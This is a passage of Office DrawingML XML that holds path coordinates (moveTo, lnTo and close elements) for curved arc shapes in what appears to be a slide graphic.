                <a:lnTo>
                  <a:pt x="1639430" y="3877386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1592935" y="3862616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1547012" y="3846652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1501660" y="3829520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1456905" y="3811232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412773" y="3791801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1369263" y="3771252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1326413" y="3749598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1284224" y="3726853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1242733" y="3703053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201953" y="3678199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1161884" y="3652316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1122565" y="3625418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084008" y="3597529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046226" y="3568674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1009243" y="3538855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="973074" y="3508083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937742" y="3476409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903249" y="3443821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869645" y="3410356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="836917" y="3376015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805103" y="3340836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="774217" y="3304819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="744270" y="3267989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715276" y="3230372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687273" y="3191967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="660260" y="3152813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="634276" y="3112922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609307" y="3072307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585406" y="3030982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="562571" y="2988983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540829" y="2946311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520192" y="2902991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500672" y="2859036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482307" y="2814472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465099" y="2769311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449072" y="2723578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="434251" y="2677287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420636" y="2630449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408254" y="2583103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397141" y="2535237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332752" y="2535237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343382" y="2583472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355231" y="2631198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368300" y="2678417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382562" y="2725115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397979" y="2771267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="414566" y="2816872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432295" y="2861881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451142" y="2906306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471093" y="2950121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492125" y="2993313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514235" y="3035858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537400" y="3077743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561606" y="3118942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="586828" y="3159455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613054" y="3199257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="640257" y="3238322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668439" y="3276650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697572" y="3314217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727646" y="3350996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758621" y="3386988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790511" y="3422154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="823290" y="3456508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856932" y="3489998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891413" y="3522637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="926744" y="3554387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="962875" y="3585248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="999820" y="3615182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1037539" y="3644201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1076032" y="3672255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115263" y="3699357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1155230" y="3725468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1195908" y="3750589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1237297" y="3774681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1279347" y="3797744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1322070" y="3819766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365440" y="3840708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1409446" y="3860584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1454061" y="3879342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499260" y="3896995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1545056" y="3913505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1591398" y="3928872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1638287" y="3943070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1685709" y="3956075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1733638" y="3967886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782076" y="3978465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782076" y="3914330"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321809" h="4310380">
                <a:moveTo>
                  <a:pt x="1782076" y="331533"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1733638" y="342163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1685709" y="354012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1638287" y="367068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1591398" y="381304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1545056" y="396722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499260" y="413283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1454061" y="430987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1409446" y="449821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365440" y="469747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1322070" y="490766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1279347" y="512851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1237297" y="535990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1195908" y="560171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1155230" y="585368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115263" y="611555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1076032" y="638746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1037539" y="666889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="999820" y="695998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="962875" y="726033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="926744" y="756983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891413" y="788835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856932" y="821575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="823290" y="855179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790511" y="889635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758621" y="924915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727646" y="961021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697572" y="997915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668439" y="1035596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="640257" y="1074039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613054" y="1113243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="586828" y="1153160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561606" y="1193800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537400" y="1235138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514235" y="1277150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492125" y="1319834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471093" y="1363154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451142" y="1407109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432295" y="1451673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="414566" y="1496834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397979" y="1542567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382562" y="1588871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368300" y="1635709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355231" y="1683080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343382" y="1730959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332752" y="1779333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397141" y="1779333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408254" y="1731327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420636" y="1683816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="434251" y="1636826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449072" y="1590382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465099" y="1544497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482307" y="1499196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500672" y="1454480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520192" y="1410385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540829" y="1366926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="562571" y="1324114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585406" y="1281976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609307" y="1240523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="634276" y="1199781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="660260" y="1159764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687273" y="1120482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715276" y="1081963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="744270" y="1044219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="774217" y="1007275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805103" y="971143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="836917" y="935850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869645" y="901407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903249" y="867841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937742" y="835152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="973074" y="803376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1009243" y="772515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046226" y="742607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084008" y="713651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1122565" y="685673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1161884" y="658698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201953" y="632739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1242733" y="607809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1284224" y="583933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1326413" y="561136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1369263" y="539419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412773" y="518807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1456905" y="499313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1501660" y="480974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1547012" y="463791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1592935" y="447789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1639430" y="432981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1686458" y="419392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1734007" y="407035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782076" y="395922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782076" y="331533"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321809" h="4310380">
                <a:moveTo>
                  <a:pt x="3345700" y="3955859"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3291979" y="3902265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3250527" y="3928135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3208617" y="3952951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3166262" y="3976713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3123501" y="3999407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3080334" y="4021048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3036786" y="4041635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2992869" y="4061168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2948622" y="4079646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2904045" y="4097070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2859163" y="4113441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2813989" y="4128744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2768562" y="4143006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2722880" y="4156202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2676969" y="4168343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2630843" y="4179430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2584539" y="4189450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2538057" y="4198429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2491422" y="4206354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2444648" y="4213212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2397772" y="4219016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350795" y="4223766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2303742" y="4227461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2256625" y="4230103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2209482" y="4231691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2162302" y="4232224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2115134" y="4231691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2067991" y="4230103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2020874" y="4227461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1973821" y="4223766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1926844" y="4219016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1879968" y="4213212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1833194" y="4206354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1786559" y="4198429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1740077" y="4189450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1693773" y="4179430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1647647" y="4168343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1601736" y="4156202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1556054" y="4143006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1510626" y="4128744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1465453" y="4113441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420571" y="4097070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1375994" y="4079646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331747" y="4061168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1287830" y="4041635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244282" y="4021048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201115" y="3999407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1158354" y="3976713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115999" y="3952951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074089" y="3928135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032649" y="3902265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978928" y="3955859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1020343" y="3982580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1062253" y="4008247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1104620" y="4032872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1147432" y="4056443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1190663" y="4078973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234300" y="4100449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1278331" y="4120883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1322717" y="4140263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1367447" y="4158602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412506" y="4175887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1457883" y="4192130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1503540" y="4207319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549463" y="4221467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595653" y="4234561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1642059" y="4246613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1688680" y="4257611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1735493" y="4267568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782483" y="4276471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1829625" y="4284332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1876894" y="4291139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1924291" y="4296905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1971776" y="4301617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2019338" y="4305287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2066963" y="4307903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2114626" y="4309478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2162302" y="4309999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2209990" y="4309478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257653" y="4307903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2305278" y="4305287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2352840" y="4301617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2400325" y="4296905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2447721" y="4291139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494991" y="4284332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2542133" y="4276471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589123" y="4267568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2635935" y="4257611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2682557" y="4246613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2728963" y="4234561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775140" y="4221467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2821076" y="4207319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2866733" y="4192130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2912110" y="4175887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2957169" y="4158602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3001899" y="4140263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3046285" y="4120883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3090316" y="4100449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3133953" y="4078973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3177184" y="4056443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3219996" y="4032872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3262363" y="4008247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3304273" y="3982580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3345700" y="3955859"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321809" h="4310380">
                <a:moveTo>
                  <a:pt x="3345700" y="354139"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3304273" y="327431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3262363" y="301752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3219996" y="277139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3177184" y="253555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3133953" y="231038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3090316" y="209550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3046285" y="189128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3001899" y="169735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2957169" y="151409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2912110" y="134112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2866733" y="117881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2821076" y="102679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775153" y="88544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2728963" y="75438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2682557" y="63398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2635935" y="52387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589123" y="42443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2542133" y="33528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494991" y="25679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2447721" y="18859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2400325" y="13106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2352840" y="8382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2305278" y="4724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257653" y="2095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2209990" y="533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2162314" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2114626" y="533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2066963" y="2095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2019338" y="4724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1971776" y="8382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1924291" y="13106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1876894" y="18859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1829625" y="25679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782483" y="33528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1735493" y="42443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1688680" y="52387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1642059" y="63398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595653" y="75438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549476" y="88544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1503540" y="102679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1457883" y="117881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412506" y="134112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1367447" y="151409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1322717" y="169735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1278331" y="189128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234300" y="209550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1190663" y="231038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1147432" y="253555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1104620" y="277139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1062253" y="301752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1020343" y="327431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978928" y="354139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032649" y="407733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074089" y="381876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115999" y="357060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1158354" y="333298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201115" y="310603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244282" y="288963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1287830" y="268376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331747" y="248843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1375994" y="230365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420571" y="212940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1465453" y="196570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1510626" y="181267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1556054" y="167005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1601736" y="153809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1647647" y="141668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1693773" y="130581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1740077" y="120561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1786559" y="111582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1833194" y="103657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1879968" y="96799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1926844" y="90995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1973821" y="86245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2020874" y="82550"/>
                </a:lnTo>
                <a:lnTo>
